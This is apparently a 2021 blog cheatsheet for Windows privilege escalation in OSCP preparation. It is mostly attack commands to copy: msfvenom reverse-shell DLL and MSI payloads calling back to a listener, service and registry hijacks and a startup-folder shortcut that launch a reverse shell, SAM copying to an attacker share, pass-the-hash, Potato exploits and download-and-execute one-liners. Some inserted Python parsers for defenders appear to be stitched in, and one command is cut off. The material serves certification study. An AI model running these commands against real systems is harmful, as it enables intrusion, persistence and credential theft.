Windows L33T! — PE Cheatsheet [OSCP Prep]

Yara AlHumaidan (0xy37)
7 min read · Jun 24, 2021

One of the things that was hard for me to master during my OSCP preparation was privilege escalation. I didn't know what to look for, where to start, or even what to consider as important information in my privilege escalation technique.

For my Linux privilege escalation cheatsheet, please check THIS page.

Initial Enumeration

systeminfo
wmic qfe
wmic logicaldisk get caption,description,providername
whoami /all
net user
findstr /si password *.txt *.config *.ini
sc query windefend
netsh firewall show state
netsh firewall show config

Check for Kernel Exploits

I usually use tools in this step, as it is much easier.

Windows Exploit Suggester

On the target:

systeminfo > systeminfo.txt

On Kali:

# python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less

Windows-Exploit-Suggester

root@kali:/opt# git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
root@kali# /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --update
root@kali# pip install xlrd --upgrade
root@kali# /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --database 2020-05-13-mssb.xls --systeminfo sysinfo

Pre-compiled Kernel exploits

This is very helpful if you usually have errors while compiling (yup, me too).

Check for Service Exploits

  • Insecure Service Properties

Run winPEAS (absolutely the best tool for Windows PE) to check for service misconfigurations:

> .\winPEASany.exe quiet servicesinfo

We can confirm manually whether we can reconfigure and restart the service with the help of accesschk.exe:

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
RW daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL

Check the current configuration of the service:

> sc qc daclsvc

Check the current status of the service:

> sc query daclsvc

Reconfigure the service to use our reverse shell executable:

> sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

Start a listener on Kali, and then start the service to trigger the exploit:

> net start daclsvc
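
The accesschk output above is easy to misread when it is printed for dozens of services at once. As an added example (not code from the original post, winPEAS or accesschk), the Python script below parses accesschk's service-permission layout (an `RW name` / `R  name` line followed by the granted right names) and reports, per service, whether the queried user can reconfigure it and whether they can also restart it. The daclsvc block in the sample mirrors the output shown above; the Spooler and mockupdater blocks, and the classification of which rights count as "reconfigure", are my assumptions for the demonstration. From a defender's side, any service where an unprivileged user lands in the reconfigure set is the finding to fix.

```python
"""Triage accesschk service-permission output (added example; sample data constructed)."""

# Rights that let the principal change what the service executes, or who may edit its ACL.
CONFIG_RIGHTS = {
    "SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG",
    "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL", "GENERIC_WRITE",
}

# Constructed sample in the layout accesschk prints for `-uwcqv <user> *`:
# an access line ("RW name" / "R  name") followed by the granted right names.
# The daclsvc block mirrors the output above; Spooler and mockupdater are made up.
SAMPLE = """\
RW daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL
R  Spooler
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        READ_CONTROL
RW mockupdater
        SERVICE_CHANGE_CONFIG
        READ_CONTROL
"""


def parse_accesschk(text):
    """Return {service_name: set_of_right_names} from accesschk -c output.
    Service names containing spaces are not handled (rare, and accesschk quotes none)."""
    services = {}
    current = None
    for raw in text.splitlines():
        parts = raw.split()
        if not parts:
            continue
        # Header line: access summary (R, W or RW) followed by the service name.
        if parts[0] in ("R", "W", "RW") and len(parts) == 2:
            current = parts[1]
            services[current] = set()
        # Right names are single upper-case tokens such as SERVICE_STOP.
        elif current is not None and len(parts) == 1 and parts[0].isupper():
            services[current].add(parts[0])
    return services


def capabilities(rights):
    """Map a right set onto what matters for escalation."""
    caps = set()
    if rights & CONFIG_RIGHTS:
        caps.add("reconfigure")  # can point the service at another binary
    if "SERVICE_ALL_ACCESS" in rights or {"SERVICE_START", "SERVICE_STOP"} <= rights:
        caps.add("restart")      # can trigger the change without a reboot
    return caps


def findings(text):
    """Services the queried user can reconfigure; restart-only services are not findings."""
    result = {}
    for name, rights in parse_accesschk(text).items():
        caps = capabilities(rights)
        if "reconfigure" in caps:
            result[name] = caps
    return result


if __name__ == "__main__":
    for name, caps in findings(SAMPLE).items():
        print(f"{name}: {', '.join(sorted(caps))}")
```

Run `accesschk.exe /accepteula -uwcqv <user> *` on the host, save the output, and feed it to `findings()`; a service that is "reconfigure" but not "restart" still matters, since the changed binary runs at the next reboot or when another principal restarts it.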

  • Unquoted Service Path:

Confirm this using sc:

> sc qc unquotedsvc

Use accesschk.exe to check for write permissions on the directories along the service path:

C:\Users\user>accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
RW BUILTIN\Users
RW NT SERVICE\TrustedInstaller
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators

C:\Users\user>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Unquoted Path Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:\Users\user>copy C:\Users\user\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
1 file(s) copied.

C:\Users\user>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
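
Why `Common.exe` is the file that gets picked up is easier to see when the search order is computed rather than guessed. The following Python is an added example (not from the original post or from sc.exe) that parses `sc qc` output, decides whether the binary path is unquoted and contains spaces, and lists every path CreateProcess tries before the real executable together with the directories an administrator has to audit for write access. The unquotedsvc block is the output shown above; the quoted examplesvc block and the service/vendor names in it are constructed.

```python
"""Detect unquoted service paths from `sc qc` output (added example)."""
import re

# Output of `sc qc unquotedsvc` as shown above (raw string: Windows paths contain backslashes).
UNQUOTED = r"""
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Unquoted Path Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
"""

# Constructed control case: quoted path with arguments, not running as SYSTEM.
QUOTED = r"""
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: examplesvc
BINARY_PATH_NAME : "C:\Program Files\Example Vendor\svc.exe" -k netsvcs
SERVICE_START_NAME : NT AUTHORITY\LocalService
"""


def parse_sc_qc(text):
    """Split `sc qc` output into a {FIELD: value} dict (lines without ':' are skipped)."""
    fields = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")  # only the first ':' separates field and value
        fields[key.strip()] = value.strip()
    return fields


def executable_part(binpath):
    """The path up to and including '.exe'; anything after it is arguments."""
    m = re.match(r"(.*?\.exe)", binpath, re.IGNORECASE)
    return m.group(1) if m else binpath


def hijack_candidates(binpath):
    """Paths CreateProcess tries before the real executable when the path is
    unquoted and contains spaces: every space-delimited prefix plus '.exe'.
    Returns [] for a quoted path or for one without spaces."""
    binpath = binpath.strip()
    if binpath.startswith('"'):
        return []
    words = executable_part(binpath).split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


def directories_to_audit(binpath):
    """Parent directories of the candidates; none may be writable by unprivileged users."""
    return sorted({c.rsplit("\\", 1)[0] + "\\" for c in hijack_candidates(binpath)})


def assess(sc_qc_output):
    """Summarise one service: is the path unquoted, and does it run as SYSTEM?"""
    f = parse_sc_qc(sc_qc_output)
    path = f.get("BINARY_PATH_NAME", "")
    return {
        "service": f.get("SERVICE_NAME", "?"),
        "unquoted": bool(hijack_candidates(path)),
        "runs_as_system": f.get("SERVICE_START_NAME", "") == "LocalSystem",
        "candidates": hijack_candidates(path),
        "audit_dirs": directories_to_audit(path),
    }


if __name__ == "__main__":
    for sample in (UNQUOTED, QUOTED):
        r = assess(sample)
        print(r["service"], "unquoted" if r["unquoted"] else "ok", r["audit_dirs"])
```

The fix on the defender's side is to quote the ImagePath (`sc config <svc> binpath= "\"C:\...\service.exe\""`) and to make sure the listed directories are not writable by BUILTIN\Users, which is exactly what the accesschk output above revealed.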

  • Weak Registry Permissions:

Confirm the issue using PowerShell:

PS> Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List

Confirm the issue using accesschk.exe:

> .\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

Overwrite the ImagePath registry value to point to our reverse shell executable (alternatively, point it at a command that adds a user to the local Administrators group):

> reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
> net start regsvc

  • Insecure Service Executables:

Confirm this with accesschk.exe:

> .\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

Copy the reverse shell executable to overwrite the service executable:

> copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
> net start filepermsvc

  • DLL Hijacking:

Use winPEAS to enumerate non-Windows services:

> .\winPEASany.exe quiet servicesinfo

The "dllsvc" service is vulnerable to DLL hijacking; the service runs the dllhijackservice.exe executable. We can confirm this manually:

> sc qc dllsvc

On Kali, generate a reverse shell DLL named hijackme.dll:

# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f dll -o hijackme.dll

Start a listener on Kali and then stop/start the service to trigger the exploit:

> net stop dllsvc
> net start dllsvc

Check the Registry

  • AutoRuns

winPEASany.exe quiet applicationsinfo

Confirm the issue manually:

> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Use accesschk.exe to verify the permissions on each one, then overwrite a writable autorun executable with the reverse shell:

> accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
> copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"

Start a listener on Kali, and then restart the Windows VM:

shutdown /r

  • AlwaysInstallElevated

This can be checked with PowerUp, or with winPEAS:

.\winPEASany.exe quiet windowscreds

[+] Checking AlwaysInstallElevated
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!

Verify this manually:

> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
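
A detail that the two queries above do not make explicit: Windows Installer only honours AlwaysInstallElevated when the value is 1 in both HKLM and HKCU, so a single hit is not yet a finding. The Python below is an added example (not from the original post or from PowerUp/winPEAS) that parses `reg query` output for the two hives and applies that rule, treating a missing key the way reg.exe reports it. The sample outputs are constructed.

```python
"""Evaluate AlwaysInstallElevated from `reg query` output (added example)."""

POLICY_VALUE = "AlwaysInstallElevated"

# Constructed samples of what `reg query <hive>\...\Installer /v AlwaysInstallElevated` prints.
HKLM_SET = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_SET = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_ZERO = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x0
"""
# reg.exe prints this (and exits non-zero) when the key or value does not exist.
HKCU_MISSING = "ERROR: The system was unable to find the specified registry key or value."


def read_dword(reg_query_output, name):
    """Return the REG_DWORD value of `name`, or 0 when the key/value is missing."""
    for line in reg_query_output.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[0].lower() == name.lower() and parts[1] == "REG_DWORD":
            return int(parts[2], 16)  # reg.exe prints DWORDs as 0x...
    return 0


def always_install_elevated(hklm_output, hkcu_output):
    """Installer runs MSI packages as SYSTEM only when BOTH hives set the policy to 1."""
    return (read_dword(hklm_output, POLICY_VALUE) == 1
            and read_dword(hkcu_output, POLICY_VALUE) == 1)


if __name__ == "__main__":
    print("exploitable:", always_install_elevated(HKLM_SET, HKCU_SET))
    print("HKCU missing:", always_install_elevated(HKLM_SET, HKCU_MISSING))
```

For remediation it follows from the same rule that clearing the policy in either hive is enough to neutralise it, but both should be removed so a later user-level policy cannot re-enable it.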

Create the exploit on Kali:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f msi -o reverse.msi

Then run the command below on the target:

msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

You should then receive a shell on your listener.

Check for Passwords

  • Searching the Registry for Passwords

> .\winPEASany.exe quiet filesinfo userinfo

We can use these creds with a lot of tools, depending on the machine and which ports are open:

winexe -U 'admin%password123' //192.168.1.1 cmd.exe
winexe -U 'admin%password123' --system //10.10.1.1 cmd.exe

  • Saved Creds

> winPEASx64.exe quiet cmd windowscreds

We can confirm the issue manually:

C:\Users\user>cmdkey /list
Currently stored credentials:
Target: WindowsLive:target=virtualapp/didlogical
Type: Generic
User: 02nfpgrklkitqatu
Local machine persistence
Target: Domain:interactive=WIN-QBA94KB3IOF\admin
Type: Domain Password
User: WIN-QBA94KB3IOF\admin

We can then use these creds to run commands as that user:

runas /savecred /user:admin C:\PrivEsc\reverse.exe

Configuration Files

.\winPEASany.exe quiet cmd searchfast filesinfo

Or look for files manually:

> dir /s *pass* == *.config
> findstr /si password *.xml *.ini *.txt

SAM

If we can access the SAM and SYSTEM files, we can extract the password hashes from them:

> copy C:\Windows\Repair\SAM \\192.168.1.11\tools\
> copy C:\Windows\Repair\SYSTEM \\192.168.1.11\tools\

We can use a lot of tools to extract the creds from the SAM and SYSTEM files; one of them is creddump7:

# git clone https://github.com/Neohapsis/creddump7.git
# python2 creddump7/pwdump.py SYSTEM SAM

Then we can try to crack the hashes:

hashcat -m 1000 --force a9fdfa038c4b75ebc76dc855dd74f0da /usr/share/wordlists/rockyou.txt

  • Passing the Hash

If we can't crack the hash (or are lazy), we can try to pass the hash and get command execution:

pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //192.168.1.1 cmd.exe
pth-winexe --system -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //192.168.1.1 cmd.exe

Search for creds

Find all those strings in config files.

dir /s *pass* == *cred* == *vnc* == *.config*

Find all passwords in all files.

findstr /spin "password" *.*

These are common files to find them in. They might be base64-encoded. So look out for that.

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

Look for creds in Registry

  • VNC
reg query “HKCU\Software\ORL\WinVNC3\Password”
  • Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
  • SNMP Parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
  • Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
  • Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Check for Token Impersonation

Check whether the current user holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (listed in the whoami /all output from the initial enumeration).

The link below lists all the privileges and explains what each one can get you.

  • Juicy Potato
C:\PrivEsc\JuicyPotato.exe -l 1337 -p C:\PrivEsc\reverse.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}

Other Juicy Potato releases:

https://github.com/Kevin-Robertson/Tater

https://github.com/ohpe/juicy-potato/releases

Get a valid CLSID for the target Windows version, or run the GetCLSID.ps1 PowerShell script:

https://raw.githubusercontent.com/ohpe/juicy-potato/master/CLSID/GetCLSID.ps1

  • Rogue Potato

This is an amazing write up by 0xdf explaining this exploit:

On Kali:

sudo socat tcp-listen:135,reuseaddr,fork tcp:<win-ip>:9999

On the target:

> C:\PrivEsc\RoguePotato.exe -r 192.168.1.11 -l 9999 -e "C:\PrivEsc\reverse.exe"

  • PrintSpoofer

> C:\PrivEsc\PrintSpoofer.exe -i -c "C:\PrivEsc\

Check for Scheduled Tasks

schtasks /query /fo LIST /v

Using PowerShell:

PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

  • Startup Apps

accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

Then we can create a file containing the exploit:

' Create a shortcut in the all-users Startup folder that launches reverse.exe at logon
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\PrivEsc\reverse.exe"
oLink.Save

Then run the command below, where CreateShortcut.vbs is the file we just created:

cscript CreateShortcut.vbs

Other Checks

  • Insecure GUI Apps (Citrix Method)
tasklist /V | findstr mspaint.exe

In the navigation input, replace the contents with:

file://c:/windows/system32/cmd.exe

  • Installed Applications
> tasklist /v
> .\seatbelt.exe NonstandardProcesses
> .\winPEASany.exe quiet processinfo

  • Hot Potato

Works on Windows 7, 8 and early versions of Windows 10:

.\potato.exe -ip 192.168.1.1 -cmd "C:\PrivEsc\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true

  • Port forwarding

We can use plink.exe:

> plink.exe <user>@<kali> -R <kaliport>:<target-IP>:<target-port>
> plink.exe root@192.168.1.11 -R 445:127.0.0.1:445

Windows Subsystem for Linux (WSL)

wsl whoami
./ubuntu1604.exe config --default-user root

Check for bash.exe and the distribution root filesystem:

C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[…]\bash.exe
C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Run a shell payload through WSL:

wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

TeamViewer_Service.exe

This exploit is very well explained by 0xdf in his blog:

PS C:\> tasklist
…[snip]…
TeamViewer_Service.exe 3108 0 18,392 K
…[snip]…

Automated tools:

You can always search for your favourite tool; make sure it is still updated and maintained on GitHub:

PowerUp

https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

  • Sherlock

Other useful commands

  • Add a user to the local Administrators group (useful before enabling RDP)

net localgroup administrators <username> /add
  • Transfer Files — using smbserver.py from impacket

root@kali# smbserver.py share . -smb2support -username df -password df

Run the commands below on Windows:

> net use \\<kali-ip>\share /u:df df
> copy <file-you-want-to-send-to-kali> \\<kali-ip>\share\
> copy \\<kali-ip>\share\<file-you-want-to-get-from-kali> .

or you can use Invoke-WebRequest:

Invoke-WebRequest http://<kali-ip>/winPEASx64.exe -OutFile winPEASx64.exe

Using PowerShell:

powershell iex (New-Object System.Net.WebClient).DownloadString('https://<kali-ip>/shell.ps1')

Or using certutil. I found this VERY handy if I don't have a fully interactive shell and cannot run PowerShell:

certutil -urlcache -f http://<kali-ip>/PowerUp.ps1 powerup.ps1

Finally, privilege escalation is one of the most critical modules in OSCP, and it is very important to practice the above techniques and understand what to expect and what to look for in the output of the above commands.

Some references and courses that really helped:

Windows Privilege Escalation for OSCP & Beyond

Windows Privilege Escalation for Beginners

PayloadsAllTheThings — Windows - Privilege Escalation

sushant747 — Privilege Escalation Windows

2018-01-26-Windows-Privilege-Escalation-Guide

Fuzzysecurity

Book.hacktricks-checklist-windows-privilege-escalation


Yara AlHumaidan (0xy37)

Penetration Testing Consultant | OSCP | OSWP | eWAPTXv2 | CRTP